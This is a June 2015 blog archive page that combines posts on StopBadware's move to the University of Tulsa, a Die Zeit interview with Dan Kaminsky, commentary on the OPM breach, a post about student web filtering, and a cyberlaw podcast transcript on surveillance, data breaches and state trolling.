Monthly Archives: June 2015

StopBadware transferring operations to University of Tulsa

In 2006, Harvard’s Berkman Center introduced a new project: StopBadware.org, a collective effort to protect consumers from bad software and expose the people who profited from it. StopBadware was to be a collaboration between the academic community and leading technology companies, a force for transparency and openness in an increasingly siloed online environment, and a haven for users seeking information about bad software and malicious websites. The project was backed by Internet pioneers in both business and academia: founders Jonathan Zittrain and John Palfrey, advisers Vint Cerf and Esther Dyson, supporting companies including Google and Lenovo. From its first day, StopBadware was a collaboration intended to demonstrate the full promise of the Internet by protecting and expanding user choice.

After almost a decade of collaborative work and more than five years as a standalone nonprofit, StopBadware is shutting down operations as an independent organization and transferring core programs to the University of Tulsa, where they’ll be run by our longtime research adviser, Dr. Tyler Moore. This decision rested upon two pillars: the unpredictability of long-term funding prospects and the strength of our ties to the research community. Ultimately, StopBadware’s board and staff agreed that our mission is better served by re-establishing roots in academia under the capable guidance of Dr. Moore and his team.

The programs we expect to transfer to Tulsa include our independent review process, the StopBadware Data Sharing Program, and maintenance of informational resources and searchable Clearinghouse.

What does this mean in practical terms?

  • Users and webmasters will still be able to look up URLs, IPs, and ASNs in our Clearinghouse and report malicious URLs to our community feed.
  • Website owners whose resources are blacklisted by one or more of our data providers will still be able to request an independent review from StopBadware.
  • Technology companies, independent security researchers, and academic institutions will still be able to contribute malware data feeds to StopBadware’s data sharing program.
  • StopBadware’s shared and proprietary data will still be used to facilitate research on cybercrime and the security ecosystem.
  • Users who encounter browser or search warnings about malware websites will still be able to reach StopBadware information about badware and how to protect their computers.

StopBadware’s Boston-based office and staff will cease operation by September, as will our current board of directors. Over the next few months, we’ll also be shutting down the StopBadware Partner program and the We Stop Badware™ Web Host program in order to let the incoming team in Tulsa focus on the review process, data sharing program, and research projects. The StopBadware Board and outgoing staff have known Tyler Moore since our early days as a Berkman Center project; we have the utmost confidence in his vision and unflagging dedication to StopBadware’s mission.

Over the next two months, we’ll be painting a bigger picture for our community to illustrate StopBadware’s accomplishments, both as an independent nonprofit and as a decade-old project in collaborative security. We’ll also turn our blog over to Dr. Moore part-time so he can expound upon his plans for the new iteration of StopBadware. Like many other good Internet citizens, we welcome the future!

- The StopBadware team

Waterloo

Captain Clement Swetenham, 16th Light Dragoons, fought at Waterloo. His great-great-great grandson Foster Swetenham has posted more information and photos of his portrait, his Waterloo and Peninsula medals and his charger Mask.

 

Safe Computing In An Unsafe World: Die Zeit Interview

So some of the more fun bugs involve one team saying, “Heh, we don’t need to validate input, we just pass data through to the next layer.”  And the the next team is like, “Heh, we don’t need to validate input, it’s already clean by the time it reaches us.”  The fun comes when you put these teams in the same room.  (Bring the popcorn, but be discreet!)

Policy and Technology have some shared issues, that sometimes they want each other to solve.  Meanwhile, things stay on fire.

I talked about some of our challenges in Infosec with Die Zeit recently.  Germany got hit pretty bad recently and there’s some soul searching.  I’ll let the interview mostly speak for itself, but I would like to clarify two things:

1) Microsoft’s SDL (Security Development Lifecycle) deserves more credit.  It clearly yields more secure code.  But getting past code, into systems, networks, relationships, environments — there’s a scale of security that society needs, which technology hasn’t achieved yet.

2) I’m not at all advocating military response to cyber attacks.  That would be awful.  But there’s not some magic Get Out Of War free card just because something came over the Internet.  For all the talk of regulating non-state actors, it’s actually the states that can potentially completely overwhelm any potential technological defense.   Their only constraints are a) fear of getting caught, b) fear of damaging economic interests, and c) fear of causing a war.  I have doubts as to how strong those fears are, or remain.  See, they’re called externalities for a reason…

(Note:  This interview was translated into German, and then back into English.  So, if I sound a little weird, that’s why.)


Der IT-Sicherheitsforscher und Hacker Dan Kaminsky

(Headline) „No one knows how to make a computer safe.”

(Subheading) The American computer security specialist Dan Kaminsky talks about the cyber-attack on the German Bundestag: In an age of hacker wars, diplomacy is a stronger weapon than technology.

AMENDED VERSION

Dan Kaminsky (https://dankaminsky.com/bio/) is one of the most well-known hacker- and IT security specialists in the United States. He made a name for himself with the discovery of severe security holes on the Internet and in computer systems of large corporations. In 2008, he located a basic error in the DNS, (http://www.wired.com/2008/07/kaminsky-on-how/), the telephone book of the Internet, and coordinated a worldwide repair. Nowadays, he works as a “chief scientist” at the New York computer security firm White Ops. (http://www.whiteops.com).

Questions asked by Thomas Fischermann

ZEIT Online: After the cyber attack on the German Bundestag, there has been a lot of criticism against the IT manager. (http://www.zeit.de/digital/datenschutz/2015-06/hackerangriff-bundestag-kritik).
Are the Germans sloppy when it comes to computer security?

Dan Kaminsky: No one should be surprised if a cyber attack succeeds somewhere. Everything can be hacked. I assume that all large companies are confronted somehow with hackers in their systems, and in national systems, successful intrusions have increased. The United States, e.g., have recently lost sensitive data of people with “top security” access to state secrets to Chinese hackers. (http://www.reuters.com/article/2015/06/15/us-cybersecurity-usa-exposure-idUSKBN0OV0CC20150615)

ZEIT Online: Due to secret services and super hackers employed by the government who are using the Internet recently?

Kaminsky: I’ll share a business secret with you: Hacking is very simple. Even teenagers can do that. And some of the most sensational computer break-ins in history are standard in technical terms – e.g., the attack on the Universal Sony Pictures in the last year where Barack Obama publically blamed North Korea for. (http://www.zeit.de/2014/53/hackerangriff-sony-nordkorea-obama). Three or four engineers manage that in three to four months.

ZEIT Online: It has been stated over and over again that some hacker attacks carry the “signature” of large competent state institutions.

Kaminsky: Sometimes it is true, sometimes it is not. Of course, state institutions can work better, with less error rates, permanently and more unnoticed. And they can attack very difficult destinations: e.g., nuclear power plants, technical infrastructures. They can prepare future cyber-attacks and could turn off the power of an entire city in case of an event of war.

ZEIT Online: But once more: Could we not have protected the computer of the German Bundestag better?

Kaminsky: There is a very old race among hackers between attackers and defenders. Nowadays, attackers have a lot of possibilities while defenders only have a few. At the moment, no one knows how to make a computer really safe.

ZEIT Online: That does not sound optimistic.

Kaminsky: The situation can change. All great technological developments have been unsafe in the beginning, just think of the rail, automobiles and aircrafts. The most important thing in the beginning is that they work, after that they get safer. We have been working on the security of the Internet and the computer systems for the last 15 years…

ZEIT Online: How is it going?

Kaminsky: There is a whole movement for example that is looking for new programming methods in order to eliminate the gateways for hackers. In my opinion, the “Langsec” approach is very interesting (http://www.upstandinghackers.com/langsec), with which you are looking for a kind of a binding grammar for computer programs and data formats that make everything safe. If you follow the rules, it should be hard for a programmer to produce that kind of errors that would be used by hostile hackers later on. When a system executes a program in the future or when a software needs to process a data record, it will be checked precisely to see if all rules where followed – as if a grammar teacher would check them.

ZEIT Online: That still sounds very theoretical…

Kaminsky: It is a new technology, it is still under development. In the end it will not only be possible to write a secure software, but also to have it happen in a natural way without any special effort, and it shall be cheap.

ZEIT Online: Which other approaches do you consider promising?

Kaminsky: Ongoing safety tests for computer networks are becoming more widespread: Firms and institutions pay hackers to permanently break-in in order to find holes and close them. Nowadays, this happens sporadically or in large intervals, but in the future we will need more of those “friendly” hackers.  Third, there is a totally new generation of anti-hacker software in progress. Their task is not to prevent break-ins – because they will happen anyway – but to observe the intruders very well. This way we can assess better who the hackers are and we can prevent them from gaining access over days or weeks.

ZEIT Online: Nevertheless, those are still future scenarios. What can we do today if we are already in possession of important data? Go offline?

Kaminsky: No one will go offline. That is simply too inefficient. Even today you can already store data in a way that they are not completely gone after a successful hacker attack. You split them. Does a computer user really ever need to have access to all the documents in the whole system? Does the user need so much system band width that he can download masses of documents?

ZEIT Online: A famous case for this is the US Secret Service that lost thousands of documents to Edward Snowden. There are also a lot of hackers though who work for the NSA in order to break in other computer systems …

Kaminsky: … yeah, and that is poison for the security of the net. The NSA and a lot of other secret services say nowadays: We want to defend our computers – and attack the others. Most of the time, they decide to attack and make the Internet even more unsafe for everyone.

ZEIT Online: DO you have an example for this?

Kaminsky: American secret services have known for more than a decade that a spy software can be saved on the operating system of computer hard disks.
(http://www.geek.com/apps/nsa-malware-found-hiding-in-hard-drives-for-almost-20-years-1615949/, http://www.kaspersky.com/about/news/virus/2015/Equation-Group-The-Crown-Creator-of-Cyber-Espionage). Instead of getting rid of those security holes, they have been actively using it for themselves over the years… The spyware was open for the secret services – who have been using it for a number of malwares that have been discovered recently– and for everyone who has discovered those holes as well.

ZEIT Online: Can you change such a behavior?

Kaminsky: Yes, economically. Nowadays, spying authorities draw their right to exist from being able to get information from other people’s computer. If they made the Internet safer, they would hardly be rewarded for that…

ZEIT Online: A whole industry is taking care of the security of the net as well: Sellers of anti-virus and other protection programs.

Kaminsky: Nowadays, we spend a lot of money on security programs. But we do not even know if the computers that are protected in that way are really the ones who get hacked less often. We do not have any good empirical data and no controlled study about that.

ZEIT Online: Why does no one take such studies?

Kaminsky: This is obviously a market failure. The market does not offer services that would be urgently needed for increased safety in computer networks. A classical case in which governments could make themselves useful – the state. By the way, the state could contribute something else: deterrence

ZEIT Online: Pardon?

Kaminsky: In terms of computer security, we still blame the victims themselves most of the time: You have been hacked, how dumb! But when it comes to national hacker attacks that could lead to cyber wars this way of thinking is not appropriate. If someone dropped bombs over a city, no one’s first reaction would be: How dumb of you to not having thought about defensive missiles!

ZEIT Online: How should the answer look like then?

Kaminsky: Usually nation states are good in coming up with collective punishments: diplomatic reactions, economic sanctions or even acts of war. It is important that the nation states discuss with each other about what would be an adequate level of national hacker attacks and what would be too much. We have established that kind of rules for conventional wars but not for hacker attacks and cyber war. For a long time they had been considered as dangerous, but that has changed. You want to live in a cyber war zone as little as you want to live in a conventional war zone!

ZEIT Online: To be prepared for counterstrikes you first of all have to know the attacker. We still do not know the ones who were responsible for the German Bundestag hack…

Kaminsky: Yeah, sometimes you do not know who is attacking you. In the Internet there are not that many borders or geographical entities, and attackers can even veil their background. In order to really solve this problem, you would have to change the architecture of the Internet.

ZEIT Online: You had to?

Kaminsky: … and then there is still the question: Would it be really better for us, economically wise, than the leading communication technologies Minitel from France or America Online? Were our lives better when network connections were still horrible expensive? And is a new kind of net even possible when well appointed criminals or nation states could find new ways for manipulation anyway? The „attribution problem“ with cyber attacks stays serious and there are no obvious solutions. There are a lot of solutions though that are even worse than the problem itself.

Questions were asked by Thomas Fischermann (@strandreporter, @zeitbomber)

The OPM hack is bad but it’s not a ‘cyber Pearl Harbor’

The U.S.’s Office of Personnel Management wants you to know that it thwarts 10 million hack attempts a month. But it just takes one successful breach to undo all that successful thwarting. And last year, OPM’s network was breached by an attack it identified as coming from China. The government of China has denied any involvement but 4 million federal employees have been offered 18 months of credit report monitoring.

“Follow-up reports indicate that the breach may extend well beyond federal employees to individuals who applied for security clearances with the federal government,” Brian Krebs wrote, in an excellent summation of the hack. As many as 14 million people who’ve worked for or attempted to work for the government may be affected.

What kind of information did the hackers get access to?

F-Secure’s Chief Research Officer Mikko Hypponen tweeted this sample:

OPM Hack, OPM data, secret data

Knowing which federal employees have admitted to illegal drug use could be pretty valuable information, especially if there’s anyone who is actually honest about such behavior on these kinds of forms.

That the U.S. government has had networks containing secret data infiltrated is obviously a huge problem. Especially disturbing is the news that the files weren’t encrypted because the OPM’s systems were too antiquated. (UPDATE: Apparently, encryption wouldn’t have helped.)

Some are calling this hack a “cyber Pearl Harbor” and wondering why the Obama Administration isn’t retaliating more directly. But there’s a perfectly clear reason why “cyber Pearl Harbor” is not an accurate description, as much as critics of President Obama and those in favor of cybersecurity laws like CISPA might like it to be.

“Pearl Harbor metaphors should be restricted to war,” F-Secure Security Advisor Sean Sullivan told me. “This is espionage, and so the use of it is hyperbole.”

Also, Pearl Harbor — the famed “sneak attack” on the U.S. military installations by the Japanese that killed more than 2,5000 and drew America into World War II — suggests an unprovoked attack by a state. It’s unclear if this attack was entirely unprovoked or backed by a government.

The U.S. has been accused of its own hacking and launching its own cyber attacks. The Snowden revelations include claims of “large-scale, organized cyber theft, wiretapping and supervision of political figures, enterprises and individuals of other countries, including China.” And those claims are backed up by substantial evidence, leaving the U.S. in an awkward position as it reckons with its own security failings and potential response, especially when attributing the sources of attacks is increasingly difficult.

If nothing else, this attack shows that the U.S. government suffers from the same failings as many large corporations that have fallen prey to hacks in recent years. The costs of such breaches are escalating for businesses and states.

Still it’s important to keep perspective.

Pear Harbor was an aberrational act of war that triggered a global reaction. The OPM hack is perhaps an unprecedented act of espionage when it comes to a breach of U.S. government networks. But unfortunately it doesn’t seem indicative of something unusual, but rather an ominous hint of a new normal.

[Image by Jonathan Briggs | Flickr]

Time For a Digital Detox or Better Filtering?



Being easily distracted has been a thorn in my side since Oldbury Park Primary School. I remember the day when mum and dad sat me down and read out my year 6 school report. Things were going so well, and then - boom - a comment from Mrs Horn that rained on my previously unsullied education record. ‘’Sarah can organize herself and her work quite competently if she wishes, but of late has been too easily distracted by those around her.” She had a point, but try telling that to a distraught eleven year who valued the opinion of her teachers. I made a vow after that. I would never let my report card be sullied again. Working on my concentration in secondary school and college helped me to pass my GCSEs and A-levels.


Then, when I entered the world of work I found an environment not too dissimilar to school. There were managers to impress, friends to win, and office politics instead of playground politics. Comme ci comm. But I was more informed this time, and found ways to stay focused: wearing headphones (a great way to show your otherwise engaged), meditation (limited to the park, never in the office), and writing to-do lists. But these are workplace tactics, if I were a student now, my report would probably be worse. I'd be lost with access to so many devices and so much time-wasting material.
So there, I’ve laid bare more than I should have, but I think my personal character assassination has been worth it, because it’s proved a point. Kids have always been distracted; tech has just made the problem worse. In addition to the usual classroom distractions, teachers now have to manage digital distractions, and it’s all affecting students’ progress.


For the head of the Old Hall School in Telford, Martin Stott, observing this trend was worrying. He said, “It seems to me that children’s ability to take on board the instructions for multi-step tasks has deteriorated. For a lot of children, all their conversation revolves around these games. It upsets me to see families in restaurants and as soon as they sit down the children get out their iPads.” Stott isn’t the first to raise the issue of digital dependency, (there are digital detox centers for adults who want to have a break from tech). He might, however, be the first to bring the issue to the education arena and get significant media coverage, by introducing a week’s digital embargo at his school. Students have to put away the Xboxes, iPads, and turn off the TV in an attempt to discover other activities like reading, board games and cards.

I’m split on the whole digital detox idea. The cynic asks how can a one week break to make any real change to the amount of time kids spend on devices. And restricting them completely is a sure fire way to spark rebellion. But my optimistic side says it’s a step in the right direction. It raises awareness by asking kids to realize that there’s life outside Minecraft and social media. Now that’s not so bad.

Nonetheless I do think that the problems with device dependency at Old Hall School could be solved with better filtering instead of a digital detox. As existing users will tell you, there’s a trusty little tool in our web filter known as ‘limit to quota’. Admins can configure the amount of time users can spend on different types of material, including material classified as time-wasting. According to predefined rules, users can use their allocation in bite-sized chunks, and be prompted every five or ten minutes, with an alert stating how much they’ve used. That way they’ll be no nasty shocks; when the timer eventually runs out after 60 minutes, they’ll be able to continue using the safe parts of the web that support their educational needs, without the distractions. Now that’s got to be more appealing than dropping the devices cold turkey, isn’t it?


Talking with Stewart Baker

So I went ahead and did a podcast with Stewart Baker, former general counsel for the NSA and actually somebody I have a decent amount of respect for (Google set me up with him during the SOPA debate, he understood everything I had to say, and he really applied some critical pressure publicly and behind the scenes to shut that mess down).  Doesn’t mean I agree with the guy on everything.  I told him in no uncertain terms we had some disagreements regarding backdoors. and if he asked me about them I’d say as such.  He was completely OK with this, and in today’s echo-chamber loving society that’s a real outlier.  The debate is a ways in, and starts around here.

You can get the audio (and a summary) here but as usual I’ve had the event transcribed.  Enjoy!


 

Steptoe Cyberlaw Podcast-070

Stewart: Welcome to episode 70 of the Steptoe Cyberlaw Podcast brought to you by Steptoe & Johnson; thank you for joining us. We’re lawyers talking about technology, security, privacy in government and I’m joined today by our guest commentator, Dan Kaminsky, who is the Chief Scientist at WhiteOps, the man who found and fixed a major and very troubling flaw in the DNS system and my unlikely ally in the fight against SOPA because of its impact on DNS security. Welcome, Dan.

Dan: It’s good to be here.

Stewart: All right; and Michael Vatis, formerly with the FBI and the Justice Department, now a partner in in Steptoe’s New York office. Michael, I’m glad to have you back, and I guess to be back with you on the podcast.

Michael: It’s good to have a voice that isn’t as hoarse as mine was last week.

Stewart: Yeah, that’s right, but you know, you can usually count on Michael to know the law – this is a valuable thing in a legal podcast – and Jason Weinstein who took over last week in a coup in the Cyberlaw podcast and ran it and interviewed our guest, Jason Brown from the Secret Service. Jason is formerly with the Justice Department where he oversaw criminal computer crime, prosecutions, among other things, and is now doing criminal and civil litigation at Steptoe.

I’m Stewart Baker, formerly with NSA and DHS, the record holder for returning to Steptoe to practice law more times than any other lawyer, so let’s get started. For old time’s sake we ought to do one more, one last hopefully, this week in NSA. The USA Freedom Bill was passed, was debated, not amended after efforts; passed, signed and is in effect, and the government is busy cleaning up the mess from the 48/72 hours of expiration of the original 215 and other sunsetted provisions.

So USA Freedom; now that it’s taken effect I guess it’s worth asking what does it do. It gets rid of bulk collection across the board really. It says, “No, you will not go get stuff just because you need it, and won’t be able to get it later if you can’t get it from the guy who holds it, you’re not going to get it.” It does that for a pen trap, it does that for Section 215, the subpoena program, and it most famously gets rid of the bulk collection program that NSA was running and that Snowden leaked in his first and apparently only successful effort to influence US policy.

[Helping] who are supposed to be basically Al Qaeda’s lawyers – that’s editorializing; just a bit – they’re supposed to stand for freedom and against actually gathering intelligence on Al Qaeda, so it’s pretty close. And we’ve never given the Mafia its own lawyers in wiretap cases before the wiretap is carried out, but we’re going to do that for –

Dan: To be fair you were [just] wiretapping the Mafia at the time.

Stewart: Oh, absolutely. Well, the NSA never really had much interest in the Mafia but with Title 3 yeah; you went in and you said, “I want a Title 3 order” and you got it if you met the standard, in the view of judge, and there were no additional lawyers appointed to argue against giving you access to the Mafia’s communications. And Michael, you looked at it as well – I’d say those were the two big changes – there are some transparency issues and other things – anything that strikes you as significant out of this?

Michael: I think the only other thing I would mention is the restrictions on NSLs where you now need to have specific selection terms for NSLs as well, not just for 215 orders.

Stewart: Yeah, really the house just went through and said, ”Tell us what capabilities could be used to gather international security agencies’ information and we will impose this specific selection term, requirement, on it.” That is really the main change probably for ordinary uses of 215 as though it were a criminal subpoena. Not that much change. I think the notion of relevance has probably always carried some notion that there is a point at which it gathered too much and the courts would have said, “That’s too much.”

Michael: going in that, okay, Telecoms already retain all this stuff for 18 months for billing purpose, and they’re required to by FCC regulation, but I think as we’ve discussed before, they’re not really required to retain all the stuff that NSA has been getting under bulk retention program, especially now that people have unlimited calling plans, Telecoms don’t need to retain information about every number call because it doesn’t matter for billing purposes.

So I think, going forward, we’ll probably hear from NSA that they’re not getting all the information they need, so I don’t think this issue is going to go away forever now. I think we’ll be hearing complaints and having some desire by the Administration to impose some sort of data retention requirements on Telecoms, and then they’ll be a real fight.

Stewart: That will be a fight. Yeah, I have said recently that, sure, this new approach can be as effective as the old approach if you think that going to the library is an adequate substitute for using Google. They won’t be able to do a lot of the searching that they could do and they won’t have as much data. But on the upside there are widespread rumors that the database never included many smaller carriers, never included mobile data probably because of difficulties separating out location data from the things that they wanted to look at.

So privacy concerns have already sort of half crippled the program and it also seems to me you have to be a remarkably stupid terrorist to think that it’s a good idea to call home using a phone that operates in the United States. People will use call of duty or something to communicate.

All right, the New York Times has one of its dumber efforts to create a scandal where there is none – it was written by Charlie Savage and criticized “Lawfare” by Ben Wittes and Charlie, who probably values his reputation in National Security circles somewhat, writes a really slashing response to Ben Wittes, but I think, frankly, Ben has the better of the argument.

The story says “Without public notice or debate the Obama Administration has expanded NSAs warrant with surveillance of American’s international internet traffic to search for evidence of malicious computer hacking” according to some documents obtained from Snowden. It turns out, if I understand this right, that what NSA was looking for in that surveillance, which is a 702 surveillance, was malware signatures and other indicia that somebody was hacking Americans, so they collected or proposed to collect the incoming communications from the hackers, and then to see what was exfiltrated by the hackers.

In what universe would you describe that as American’s international internet traffic? I don’t think when somebody’s hacking me or stealing my stuff, that that’s my traffic. That’s his traffic, and to lead off with that framing of the issue it’s clearly baiting somebody for an attempted scandal, but a complete misrepresentation of what was being done.

Dan: I think one of the issues is there’s a real feeling, “What are you going to do with that data?” Are you going to report it? Are you going to stop malware? Are you going to hunt someone down?

Stewart: All of it.

Dan: Where is the – really?

Stewart: Yeah.

Dan: Because there’s a lot of doubt.

Stewart: Yeah; I actually think that the FBI regularly – this was a program really to support the FBI in its mission – and the FBI has a program that’s remarkably successful in the sense that people are quite surprised when they show up, to go to folks who have been compromised to say, “By the way, you’re poned,” and most of the time when they do that some people say, “What? Huh?” This is where some of that information almost certainly comes from.

Dan: The reality is, everyone always says, “I can’t believe Sony got hacked,” and many of us actually in the field go, “Of course we can believe it.” Sony got hacked because everybody’s hacked somewhere.

Stewart: Yes, absolutely.

Dan: There’s a real need to do something about this on a larger scale. There is just such a lack of trust going on out there.

Stewart: Oh yeah.

Dan: And it’s not without reason.

Stewart: Yeah; Jason, any thoughts about the FBIs role in this?

Jason: Yeah. I think that, as you said, the FBI does a very effective job at knocking on doors or either pushing out information generally through alerts about new malware signatures or knocking on doors to tell particular victims they’ve been hacked. They don’t have to tell them how they know or what the source of the information is, but the information is still valuable.

I thought to the extent that this is one of those things under 702, where I think a reasonable person will look at this and be appreciative of the fact that the government was doing this, not critical. And as you said, the notion that this is sort of stolen internet traffic from Americans is characterized as surveillance of American’s traffic, is a little bit nonsensical.

Stewart: So without beating up Charlie Savage – I like him, he deserves it on this one – but he’s actually usually reasonably careful. The MasterCard settlement or the failed MasterCard settlement in the Target case, Jason, can you bring us up to date on that and tell us what lessons we should learn from it?

Jason: There have been so many high profile breaches in the last 18 months people may not remember Target, which of course was breached in the holiday season of 2013. MasterCard, as credit card companies often do, try to negotiate a settlement on behalf of all of their issuing banks with Target to pay damages for losses suffered as a result of the breach. In April MasterCard negotiated a proposed settlement with Target that would require Target to pay about $19 million to the various financial institutions that had to replace cards and cover for all losses and things of that nature.

But three of the largest banks, in fact I think the three largest MasterCard issuing banks, Citi Group, Capital One and JP Morgan Chase, all said no, and indicated they would not support the settlement and scuttled it because they thought $19 million was too small to cover the losses. There are trade groups for the banks and credit unions that say that between the Target and Home Depot breaches combined there were about $350 million in costs incurred by the financial institutions to reissue cards and cover losses, and so even if you factor out the Home Depot portion of that $19 million, it’s a pretty small number.

So Target has to go back to the drawing board, as does MasterCard to figure out if there’s a settlement or if the litigation is going to continue. And there’s also a proposed class action ongoing in Minnesota involving some smaller banks and credit unions as well. It would only cost them $10 million to settle the consumer class action, but the bigger exposure is here with the financial institution – Michael made reference last week to some press in which some commentator suggested the class actions from data breaches were on the wane – and we both are of the view that that’s just wrong.

There may be some decrease in privacy related class actions related to misuse of private information by providers, but when it comes to data breaches involving retailers and credit card information, I think not only are the consumer class actions not going anywhere, but the class actions involving the financial institutions are definitely not going anywhere. Standing is not an issue at all. It’s pretty easy for these planners to demonstrate that they suffered some kind of injury; they’re the ones covering the losses and reissuing the cards, and depending on the size of the breach the damages can be quite extensive. I think it’s a sign of the times that in these big breaches you’ll find banks that are insisting on a much bigger pound of flesh from the victims.

Stewart: Yeah, I think you’re right about that. The settlements, as I saw when I did a quick study of settlements for consumers, are running between 50 cents and two bucks per exposure, which is not a lot, and the banks’ expenses for reissuing cards are more like 50 bucks per victim. But it’s also true that many of these cards are never going to be used; many of these numbers are never going to be used, and so spending 50 bucks for every one of them to reissue the cards, at considerable cost to the consumers as well, might be an overreaction, and I wouldn’t be surprised if that were an argument.

Dan: So my way of looking at this is from the perspective of deterrence. Is $19 million enough of a cost to Target to cause them to change their behavior and really divest – it’s going to extraordinarily expense to migrate our payment system to the reality, which is we have online verification. We can use better technologies. They exist. There’s a dozen ways of doing it that don’t lead to a password to your money all over the world. This is ridiculous.

Stewart: It is.

Dan: I’m just going to say the big banks have a point; $19 million is –

Stewart: Doesn’t seem like a lot.

Dan: to say, “We really need to invest in this; this never needs to happen again,” and I’m not saying 350 is the right number but I’ve got to agree, 19 is not.

Stewart: All right then. Okay, speaking of everybody being hacked, everybody includes the Office of Personnel Management.

Dan: Yeah.

Stewart: My first background investigation and it was quite amusing because the government, in order to protect privacy, blacked out the names of all the investigators who I wouldn’t have known from Adam, but left in all my friends’ names as they’re talking about my drug use, or not.

Dan: Alleged.

Stewart: Exactly; no, they were all stand up guys for me, but there is a lot of stuff in there that could be used for improper purposes and it’s perfectly clear that if the Chinese stole this, stole the Anthem records, the health records, they are living the civil libertarian’s nightmare about what NSA is doing. They’re actually building a database about every American in the country.

Dan: Yeah, a little awkward, isn’t it?

Stewart: Well, annoying at least; yes. Jason, I don’t know if you’ve got any thoughts about how OPN responds to this? They apparently didn’t exactly cover themselves with glory in responding to an IG report from last year saying, “Your system sucks so bad you ought to turn them off.”

Jason: Well, first of all as your lawyer I should say that your alleged drug use was outside the limitations period of any federal or state government that I’m aware of, so no one should come after you. I thought it was interesting that they were offering credit monitoring, given that the hack has been attributed to China, which I don’t think is having any money issues and is going to steal my credit card information.

I’m pretty sure that the victims include the three of us so I’m looking forward to getting that free 18 months of credit monitoring. I guess they’ve held out the possibility that the theft was for profit as opposed to for espionage purposes, and the possibility that the Chinese actors are not state sponsored actors, but that seems kind of nonsensical to me. And I think that, as you said, as you both said, that the Chinese are building the very database on us that Americans fear that the United States was building.

Stewart: Yeah, and I agree with you that credit monitoring is a sort of lame and bureaucratic response to this. Instead, they really ought to have the FBI and the counterintelligence experts ask, “What would I do with this data if I were the Chinese?” and then ask people whose data has been exploited to look for that kind of behavior. Knowing how the Chinese do their recruiting I’m guessing they’re looking for people who have family still in China – grandmothers, mothers and the like, and who also work for the US government – and they will recruit them on the basis of ethnic and patriotic duty. And so folks who are in that situation could have their relatives visited for a little chat; there’s a lot of stuff that is unique to Chinese use of this data that we ought to be watching for a little more aggressively than stealing our credit.

Stewart: Yeah; well, that’s all we’ve got when it’s hackers. We should think of a new response to this.

Dan: We should, but like all hacks [attribution] is a pain in the butt because here’s the secret – hacking is not hard; teenagers can do it.

Stewart: Yes, that’s true.

Dan: [Something like this can take just] a few months.

Stewart: But why would they invest?

Dan: Why not? Data has value; they’ll sell it.

Stewart: Maybe; so that’s right. On the other hand the Anthem data never showed up in the markets. We have better intelligence than we used to. We’ll know if this stuff gets sold and it hasn’t been sold because – I don’t want to give the Chinese ideas but –

Dan: I don’t think they need you to give them ideas; sorry.

Stewart: One more story just to show that I was well ahead of the Chinese on this – my first security clearance they asked me for people with whom I had obligations of affection or loyalty, who were foreigners. And I said I’m an international lawyer – this was before you could just print out your Outlook contacts – I Xeroxed all those sheets of business cards that I’d collected, and I sent it to the guys and said, “These are all the clients or people I’ve pitched,” and he said, “There are like 1,000 names here.” I said, “Yeah, these are people that I either work for or want to work for.” And he said, “But I just want people to whom you have ties of obligation or loyalty or affection.” I said, “Well, they’re all clients and I like them and I have obligations to clients or I want them to be. I’ve pitched them.” And he finally stopped me and said, “No, no, I mean are you sleeping with any of them?” So good luck China, figuring out which of them, if any, I was actually sleeping with.

Dan: You see, you gave up all those names to China.

Stewart: They’re all given up.

Dan: Look what you did!

Stewart: Exactly; exactly. Okay, last a topic – Putin’s trolls – I thought this was fascinating. This is where the New York Times really distinguished itself with this article because it told us something we didn’t know and it shed light on kind of something astonishing. This is the internet association I think. Their army of trolls, and the Chinese have an even larger army of trolls, and essentially Putin’s FSB has figured out that if you don’t want to have a Facebook revolution or a Twitter revolution you need to have people on Twitter, on Facebook 24 hours a day, posting comments and turning what would otherwise be evidence of dissent into a toxic waste dump with people trashing each other, going off in weird directions, saying stupid things to the point where no one wants to read the comments anymore.

It’s now a policy. They’ve got a whole bunch of people doing it, and on top of it they’ve decided, “Hell, if the US is going to export Twitter and Twitter revolutions then we’ll export trolling,” and to the point where they’ve started making up chemical spills and tweeting them with realistic video and people weighing in to say, “Oh yeah, I can see it from my house, look at those flames.” All completely made up and doing it as though it were happening in Louisiana.

Dan: The reality is that for a long time the culture has managed. We had broadcasts, broadcasters had direct government links, everything was filtered, and the big experiment of the internet was what if we just remove those filters? What if we just let the people manage it themselves? And eventually astroturfing did not start with Russia; there’s been astroturfing for years. It’s where you have these people making fake events and controlling the message. What is changing is the scale of it. What is changing is who is doing it. What is changing is the organization and the amount of investment. You have people who are professionally operating to reduce the credibility of Twitter, of Facebook so that, quote/unquote, the only thing you can trust is the broadcast.

Stewart: I think that’s exactly right. I think they call the Chinese version of this the 50 Cent Army because they get 50 cents a post. But I guess I am surprised that the Russians would do that to us in what is plainly an effort to test to see whether they could totally disrupt our emergency response, and it didn’t do much in Louisiana but it wouldn’t be hard in a more serious crisis, for them to create panic, doubt and certainly uncertainty about the reliability of a whole bunch of media in the United States.

This was clearly a dry run and our response to it was pretty much that. I would have thought that the US government would say, “No, you don’t create fake emergencies inside the United States by pretending to be US news media.”

Jason: I was going to say all those alien sightings in Roswell in the last 50 years do you think were Russia or China?

Stewart: Well, they were pre Twitter; I’m guessing not but from now on I think we can assume they are.

Dan: What it all comes back to is the crisis of legitimacy. People do not trust the institutions that are around them. If you look there’s too much manipulation, too much skin, too many lives, and as it happens institutions are not all bad. Like you know what? Vaccines are awesome but because we have this lack of legitimacy people are looking to find what is the thing I’m supposed to be paying attention to, because the normal stuff keeps coming out that it was a lie and really, you know what, what Russia’s doing here is just saying, “We’re going to find the things that you’re going to instead, that you think are lying; we’re going to lie there too because what we really want is we want America to stop airing our dirty laundry through this Twitter thing, and if America is not going to regulate Twitter we’re just going to go ahead and make a mess of it too.”

Stewart: Yeah. I think their view is, “Well, Twitter undermines our legitimacy; we can use it to undermine yours?”

Dan: Yeah, Russians screwing with Americans; more likely than you think.

Michael: I’m surprised you guys see it as an effort to undermine Twitter; this strikes me as classic KGB disinformation tactics, and it seems to me they’re using a new medium and, as you said before, they’re doing dry runs so that when they actually have a need to engage in information operations against the US or against Ukraine or against some other country, they’ll know how to do it. They’ll have practiced cores of troll who know how to do this stuff in today’s media. I don’t think they’re trying to undermine Twitter.

Stewart: One of the things that interesting is that the authoritarians have figured out how to manage their people using electronic tools. They were scared to death by all of this stuff ten years ago and they’ve responded very creatively, very effectively to the point where I think they can maintain an authoritarian regime for a long time, without totalitarianism but still very effectively. And now they’re in the process of saying, “Well, how can we use these tools as a weapon the way they perceive the US has used the tools as weapon in the first ten years of social media.” We need a response because they’re not going to stop doing it until we have a response.

Michael: I’d start with the violation of the missile treaty before worrying about this so much.

